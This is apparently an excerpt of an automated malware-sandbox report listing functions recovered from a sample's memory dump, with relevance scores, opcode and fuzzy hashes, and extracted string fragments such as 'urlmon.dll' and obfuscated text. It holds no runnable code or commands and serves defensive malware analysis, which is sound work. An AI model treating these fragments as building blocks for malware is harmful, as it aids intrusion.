                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4deb0267b91e696058ae75f3b80e60a4ae67608623882195f3c6a5ec7ba85d63
                                            • Instruction ID: ce6116e6ec9c09a8f070f02a08721337eaa67aa767aadf04b365c91a2c72d0a8
                                            • Opcode Fuzzy Hash: 4deb0267b91e696058ae75f3b80e60a4ae67608623882195f3c6a5ec7ba85d63
                                            • Instruction Fuzzy Hash: 9A1152B23802057BF730AE559C43FAB779C9FD5B59F244015FF08AA2C1D6A5F81186B4
                                            Function 0434392D Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e55f3603a663d6ae389aec5b3f2e23ff992cfe51833c5fbd109cc028f59b73e
                                            • Instruction ID: 3de0195a68df21ebb9a2ed0c15bb25393dcf19173b420359c709726a9edd8165
                                            • Opcode Fuzzy Hash: 7e55f3603a663d6ae389aec5b3f2e23ff992cfe51833c5fbd109cc028f59b73e
                                            • Instruction Fuzzy Hash: CA116AB1A44349ABEB24EB65DC01FEB77ACEF85614F004549F919AB280DA747A01CBA1
                                            Function 0434050D Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f80561fe7874b6379dcb4ff59e3b350e0aaca597a8cd6769def54c5e8f5ff84
                                            • Instruction ID: 1e4151122f7c1248db8161aa835f8f37a50f8ec009a45f873f96790d72afdcd4
                                            • Opcode Fuzzy Hash: 7f80561fe7874b6379dcb4ff59e3b350e0aaca597a8cd6769def54c5e8f5ff84
                                            • Instruction Fuzzy Hash: 2621F1B6D01219AF9B04DFE9D8419EFB7F9EF88210F04416AE919E7200E7705A15CFA1
                                            Function 043437AD Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7902e9625cfbe4e1080d7ab936aa4afaf9d0cd1110c276670c552877d6ac941e
                                            • Instruction ID: a5280ca5f7c7860dddac039481b34c50f16b4835806458f7d97212e278ee91f3
                                            • Opcode Fuzzy Hash: 7902e9625cfbe4e1080d7ab936aa4afaf9d0cd1110c276670c552877d6ac941e
                                            • Instruction Fuzzy Hash: 04118EB1A40308BBE714EF64DC45FEB73ACEF85714F004549F918AB280EB747A018BA1
                                            Function 043447ED Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65d2a4bb970c2940134192fc3030f03d9d351a21f70adb79ba28bda70a3ee3fc
                                            • Instruction ID: f8739a76eca74b8689155996957ca42dc0878443b1eee0a4beb18704be750e27
                                            • Opcode Fuzzy Hash: 65d2a4bb970c2940134192fc3030f03d9d351a21f70adb79ba28bda70a3ee3fc
                                            • Instruction Fuzzy Hash: 140196B2205508BBDB44DF99DC81EEB77ADAF8C754F509208FA19E3250DA30F951CBA4
                                            Function 0434047D Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98551f4a137f150eab55bb0b6b9ced247baf0530dc0ceb4816c04c7ab55fd6b9
                                            • Instruction ID: 497c4266c2a13f990618d8e25d0deabf573eedcc2ce5f5befdbad8cc5ab4d93f
                                            • Opcode Fuzzy Hash: 98551f4a137f150eab55bb0b6b9ced247baf0530dc0ceb4816c04c7ab55fd6b9
                                            • Instruction Fuzzy Hash: 6001EDB2D11219AFDB44DFE8D9449EEBBF8AF48200F14556EE915F3200E7745604CFA5
                                            Function 0431F088 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0efb73d00c5cedee516fbeedf5ff3956daa76e714c72226bd5090f97a6c8b798
                                            • Instruction ID: 4ba346011db71ef57ba6a8dd79a32555bc42dfbcfd8e3bb01ed521f6a58c3bef
                                            • Opcode Fuzzy Hash: 0efb73d00c5cedee516fbeedf5ff3956daa76e714c72226bd5090f97a6c8b798
                                            • Instruction Fuzzy Hash: 8CF0E9736102166BE7145A5DAC41B96B7CCEB85334F101222FE6C87251E672F41142E1
                                            Function 04333207 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f403d3f732329e33212baf28b06a77484937563fe02a426d0199a584785f2ae
                                            • Instruction ID: f9e5dcf13def87199209458c1e5feba8a070bae2008085d7e022a40ed52871d2
                                            • Opcode Fuzzy Hash: 8f403d3f732329e33212baf28b06a77484937563fe02a426d0199a584785f2ae
                                            • Instruction Fuzzy Hash: 20F0BB719052087AEF20EF94DC46EEEB378DF94614F1052C9ED0C67141F5707E818B91
                                            Function 04343A2D Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b05b7834cd63d952803775c37644060b1baa7ab674ac8cf6716133b906a6f5d9
                                            • Instruction ID: f5fe9e0c9d88c33002af7e9fe883d4485dfcd98194ea0bca85d6a504b2b54472
                                            • Opcode Fuzzy Hash: b05b7834cd63d952803775c37644060b1baa7ab674ac8cf6716133b906a6f5d9
                                            • Instruction Fuzzy Hash: CEF01CB6240209BBE710EF99DC41EEB77ACEFC9610F004419BA29A7241DA74B951CBF1
                                            Function 0433316D Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fed1a80514c6fa1db7863ae72c74f853bda333c2cdb1dfbf31e523ce395b631
                                            • Instruction ID: 34779b0da69e608068fd371758ac22430f3c0b13aa918818bad71eb6b2f223ec
                                            • Opcode Fuzzy Hash: 7fed1a80514c6fa1db7863ae72c74f853bda333c2cdb1dfbf31e523ce395b631
                                            • Instruction Fuzzy Hash: 31F08271D05208EBDB14DFA4D841BDDBBB8EB04320F10876DE8359B2C0E634AB508785
                                            Function 0434470D Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                                            • Instruction ID: 3c8432510175bbc30ac9d2a3eaa74fd6c3032b067ab6fda4c64af553ae15b139
                                            • Opcode Fuzzy Hash: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                                            • Instruction Fuzzy Hash: 8EE06DB12403047BE614EE59DC40EEB37ACDFC5710F005008FA18A7241D670B9148AB5
                                            Function 0434657D Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54e92ae290354494b04a3b3a03cb6bd38f0468332122423aedbcc7a77d748e50
                                            • Instruction ID: 6dde063d9549c8c79c27aedb997821061669b6d81f900cbc90e084e3d23bc4ca
                                            • Opcode Fuzzy Hash: 54e92ae290354494b04a3b3a03cb6bd38f0468332122423aedbcc7a77d748e50
                                            • Instruction Fuzzy Hash: 24E0863661121437D6205989AC06FD777ECCFD2E60F0951B9FE18AB344E564BA018AE5
                                            Function 0433316A Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 687496cac65c26d5c5f19ce16bc8b3374cab13f544166feabb51df8b3e0d61ef
                                            • Instruction ID: 6355513b4c43be9b85c87049f62ba57108524738f953d7a9c3eb10bcad27cdbf
                                            • Opcode Fuzzy Hash: 687496cac65c26d5c5f19ce16bc8b3374cab13f544166feabb51df8b3e0d61ef
                                            • Instruction Fuzzy Hash: 51E09B71D15108ABDB04DF64D841BEDBBB5DB45351F14836EEC29CB2C0D6359B508744
                                            Function 043443FD Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction ID: aa427757392083a5a73de0da272b5d0b6ee25aa87286e6d053afcd6ec6b96c9a
                                            • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction Fuzzy Hash: A7E046766502047BE220BA6ADC00EDB77ACEFC5614F405019FA28A7280CA76BA1187B0
                                            Function 0431F083 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 46d1add3263de4254f303840ea8e7d5b92ea6b7c1465e8b7372c4be4e2b58ff3
                                            • Instruction ID: ae8279bc36ba110ac5ebbb334cbba2c576dff2cef646d8093a52f520f1ef2009
                                            • Opcode Fuzzy Hash: 46d1add3263de4254f303840ea8e7d5b92ea6b7c1465e8b7372c4be4e2b58ff3
                                            • Instruction Fuzzy Hash: 99D0C9F73141064AF7102A6DBC407957B8CEB80339F2067B3EA68CA2D1E767A0654260
                                            Function 0431F0FE Relevance: .0, Instructions: 17COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d1194a5b160b843f4dc29294d398a3592559424996447af51ec5d19327997f3
                                            • Instruction ID: 53a6964429031782c036160521d0fd2e556de25aef3eb18163be3026a0afa47b
                                            • Opcode Fuzzy Hash: 7d1194a5b160b843f4dc29294d398a3592559424996447af51ec5d19327997f3
                                            • Instruction Fuzzy Hash: 32D0223399416249C71D1A7C6808054B7C0B70233932433F2CAFC862A0E21310219342
                                            Function 04325EF1 Relevance: .0, Instructions: 13COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b62095ae78c649296dec5747f3a1e33818fa69e41e32831bde38f2c8da0cec30
                                            • Instruction ID: 2f25d59d9fd52bc3e1424c5f9a8f63ea98f40726f45abee3960de5cd9be80c03
                                            • Opcode Fuzzy Hash: b62095ae78c649296dec5747f3a1e33818fa69e41e32831bde38f2c8da0cec30
                                            • Instruction Fuzzy Hash: 54C02BE534C6A4141902303C42C082C2DD34C824193E21B6590D19C04AFBD2438FC0C2

                                            Non-executed Functions

                                            Function 0432EEFF Relevance: 51.4, Strings: 41, Instructions: 165COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                            • API String ID: 0-3248090998
                                            • Opcode ID: eccdc7c9ad41f021e8c34aee3de5a3014f08fb7109cfc1294260714cb7ac27af
                                            • Instruction ID: 7044167fb1af77c42d07d3449f1d660c6baa9f06c168dd9f3f9b5f8f428f6e30
                                            • Opcode Fuzzy Hash: eccdc7c9ad41f021e8c34aee3de5a3014f08fb7109cfc1294260714cb7ac27af
                                            • Instruction Fuzzy Hash: F8910FF09052A98ACB118F55A5603DFBF71BB95304F1581E9C6AA7B203C3BE4E85DF90
                                            Function 0433DA1D Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                            • API String ID: 0-1002149817
                                            • Opcode ID: 8cb3f5b1c09a03a9f0d08742364143046815c1052a3d0fa87de6d303728de871
                                            • Instruction ID: 74ff12237156515b8a276fdef16e25540e1ddd41c80c8b8a39fa3f19d0ca865f
                                            • Opcode Fuzzy Hash: 8cb3f5b1c09a03a9f0d08742364143046815c1052a3d0fa87de6d303728de871
                                            • Instruction Fuzzy Hash: 0FC130B1D00368AEEB60DFA4CC45BEEBBB9AF45304F0041D9E54CA7241E7B55A88CF61
                                            Function 0431EBEE Relevance: 20.0, Strings: 16, Instructions: 48COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .$9~b{$<9<-$bsnb$b{z=$g+&8$g+&8$g+&8.$n{z-$n{z:$qs9a$stf:$wffz$wqs9$x9n~$z:wf
                                            • API String ID: 0-2737636083
                                            • Opcode ID: 38f5691e81d655c4bf3b6e1be15c0360e2ac7b9ef72936ce2f43f7cdb1fa5f6a
                                            • Instruction ID: 44b6a6197c74b8fa2616ba5ccc03242406aad1e9af2706d4f49900f6f9428b2f
                                            • Opcode Fuzzy Hash: 38f5691e81d655c4bf3b6e1be15c0360e2ac7b9ef72936ce2f43f7cdb1fa5f6a
                                            • Instruction Fuzzy Hash: 5A21F2B1811288ABCB14CF96D981AEDBF71FB00754F608548E9406F3A4D3755A428F8A
                                            Function 0433602D Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                            • API String ID: 0-392141074
                                            • Opcode ID: 54821944a6225dbe755eef238a78142a96514963bd2bca9579d3ca47577c45f4
                                            • Instruction ID: 6de8077201712b478a0b745bad10d4f251210dd3d59ce24b49481e2468a9831b
                                            • Opcode Fuzzy Hash: 54821944a6225dbe755eef238a78142a96514963bd2bca9579d3ca47577c45f4
                                            • Instruction Fuzzy Hash: B77143B1D00628ABEB15DFD4CD41FEEB7BCAF44709F04419EE508A6141E77867888F61
                                            Function 04336026 Relevance: 16.4, Strings: 13, Instructions: 180COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                            • API String ID: 0-392141074
                                            • Opcode ID: 8b44e5f8d072bb08a88f1218419c53c6ac6a5140d8f172195303035d1663a158
                                            • Instruction ID: 87788ba70332b521ca8114de231527526679d8ab728dd8d3f1e77fd05dac6a62
                                            • Opcode Fuzzy Hash: 8b44e5f8d072bb08a88f1218419c53c6ac6a5140d8f172195303035d1663a158
                                            • Instruction Fuzzy Hash: D46132B1C00618ABEB15DFE4CD81FEEB7B8AF48709F04419EE509A6151E7786788CF61
                                            Function 04329C9D Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                            • API String ID: 0-685823316
                                            • Opcode ID: 1ebadd44c0a7ce610c4a5534ded5cbf1d0a6f66d114a802dc0cc0582643e3b65
                                            • Instruction ID: 327ecc37e1a33f790a7454596b9c9f9652e9a19ece2afc0c6e6782c1b0853b83
                                            • Opcode Fuzzy Hash: 1ebadd44c0a7ce610c4a5534ded5cbf1d0a6f66d114a802dc0cc0582643e3b65
                                            • Instruction Fuzzy Hash: AA2182B1D51218AAEF40DFD4CC45FEEBBB9AF44704F00815DE618BA180DBB566488FA5
                                            Function 04331116 Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .$P$e$i$m$o$r$x
                                            • API String ID: 0-620024284
                                            • Opcode ID: 9f1004336c2fa51da5908811e7f23c17f348196f934b3e47e1947c3fcc968a13
                                            • Instruction ID: e0ac37d1eaa515619f471b5c4c09c1253b4e57e33e0ac380458720ed399bab4b
                                            • Opcode Fuzzy Hash: 9f1004336c2fa51da5908811e7f23c17f348196f934b3e47e1947c3fcc968a13
                                            • Instruction Fuzzy Hash: E54186B580021866EB20EFA0DC41FDE77B8AF55704F0095DEA509A7141E7B977488FA1
                                            Function 0432271D Relevance: 10.0, Strings: 8, Instructions: 43COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ($-$5$8$@$]$j$}
                                            • API String ID: 0-4053083192
                                            • Opcode ID: bf9ad7535ebc2be57df6390c9e8039c682cfef43a96a296378b3d534c395aaae
                                            • Instruction ID: 306512dbd158f51c9d8c0d1d5f81e14c5414b646517eb4abf3730cd7f448bd74
                                            • Opcode Fuzzy Hash: bf9ad7535ebc2be57df6390c9e8039c682cfef43a96a296378b3d534c395aaae
                                            • Instruction Fuzzy Hash: C511DE10D0C7CA99DB12C7BC88183AEBF715F23224F4883C9D4F02A2D2D2795606D7A6
                                            Function 0433E27D Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: L$S$\$a$c$e$l
                                            • API String ID: 0-3322591375
                                            • Opcode ID: f13ee8599ca802ca39016b8b0ef83f7c0d756ee73b51ce2ae4d212ecd37bf12c
                                            • Instruction ID: be82d4c9509d786c51515f42f7a947fd559c5f221a6bfb81f32eb2517421f46e
                                            • Opcode Fuzzy Hash: f13ee8599ca802ca39016b8b0ef83f7c0d756ee73b51ce2ae4d212ecd37bf12c
                                            • Instruction Fuzzy Hash: F341C5B2C00218AFDB10DFA4DC85FEEB7F8EF88315F1491AAD909A7200E77465458F94
                                            Function 04335DE7 Relevance: 7.7, Strings: 6, Instructions: 172COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: F$P$T$f$r$x
                                            • API String ID: 0-2523166886
                                            • Opcode ID: c2e0078496091ba4dc167a4c3a7b8c8581beac936ff5b140ef2e2ce53fe88f3e
                                            • Instruction ID: 3e52d9da2cdf9591c2e1b048750af72cdb9c9abde11dc0027c620333367ad29f
                                            • Opcode Fuzzy Hash: c2e0078496091ba4dc167a4c3a7b8c8581beac936ff5b140ef2e2ce53fe88f3e
                                            • Instruction Fuzzy Hash: 7B51C371900305BFEB35DF64CC86BEEB7FCAF45705F00565AA44966180E7B8B688CBA1
                                            Function 043354FA Relevance: 6.5, Strings: 5, Instructions: 201COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $i$l$o$u
                                            • API String ID: 0-2051669658
                                            • Opcode ID: 6844a6b23da60d819fe15b401af849ecc759c1b560121121bdea4cb6478dd4b5
                                            • Instruction ID: fef4e66131ecef0a2aeda066ae4b25f7bb87e7499b79ffab90a916b7f6760ed8
                                            • Opcode Fuzzy Hash: 6844a6b23da60d819fe15b401af849ecc759c1b560121121bdea4cb6478dd4b5
                                            • Instruction Fuzzy Hash: 58614CB6900304AFDB24DFA4CC84FEFB7F9AF88711F149559E519A7240E674BA41CBA0
                                            Function 043354FD Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $i$l$o$u
                                            • API String ID: 0-2051669658
                                            • Opcode ID: ecd3f246da9256786615ec9867c80448a8743d218a5f32cc80fb53520b457a3b
                                            • Instruction ID: 661edf2c2bc04820127996a742d0e3c69feab37e53971471963333beb552ef1d
                                            • Opcode Fuzzy Hash: ecd3f246da9256786615ec9867c80448a8743d218a5f32cc80fb53520b457a3b
                                            • Instruction Fuzzy Hash: 98411AB1900308AFDB24DFA4CC84FEFBBF9AF89705F109559E519A7240D774AA45CBA0
                                            Function 0431EB4D Relevance: 6.3, Strings: 5, Instructions: 23COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 92q$\$g-al$g-alri$ri
                                            • API String ID: 0-434512970
                                            • Opcode ID: 6ec8903db7ff6caacccf63a7f52a079cf07cd1bbd3723ebc1dce79347e6b20a7
                                            • Instruction ID: e07b8127ea0fdb922aeebdc946bfdf91fb07eb56d7e495b1e6ab4415cb4e507d
                                            • Opcode Fuzzy Hash: 6ec8903db7ff6caacccf63a7f52a079cf07cd1bbd3723ebc1dce79347e6b20a7
                                            • Instruction Fuzzy Hash: D0E0D871D1424CABDB04EFE8D907BEEBBB4EF06200F1049D9C8549B351E3759604C785
                                            Function 0433518D Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
